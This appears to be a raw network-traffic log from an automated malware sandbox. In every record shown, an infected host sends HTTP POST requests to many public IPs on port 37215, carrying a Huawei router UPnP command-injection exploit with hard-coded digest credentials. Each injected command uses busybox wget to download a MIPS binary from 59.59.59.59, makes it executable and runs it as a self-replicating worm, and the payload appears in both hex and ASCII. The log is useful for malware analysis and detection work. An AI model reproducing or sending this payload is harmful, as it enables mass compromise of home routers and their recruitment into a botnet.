2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1378192.168.2.1552138197.205.57.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837002993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1379192.168.2.1533262106.156.126.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837076902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1380192.168.2.1536282117.146.201.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837102890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1381192.168.2.1544330206.171.213.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837116003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1382192.168.2.1558360157.236.91.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837131977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1383192.168.2.1543752197.76.52.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837240934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1384192.168.2.154532641.108.234.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837265968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1385192.168.2.154745241.143.215.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837285042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1386192.168.2.1533130157.234.51.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837475061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1387192.168.2.1553692195.247.123.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837496042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1388192.168.2.1556556109.16.197.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837518930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
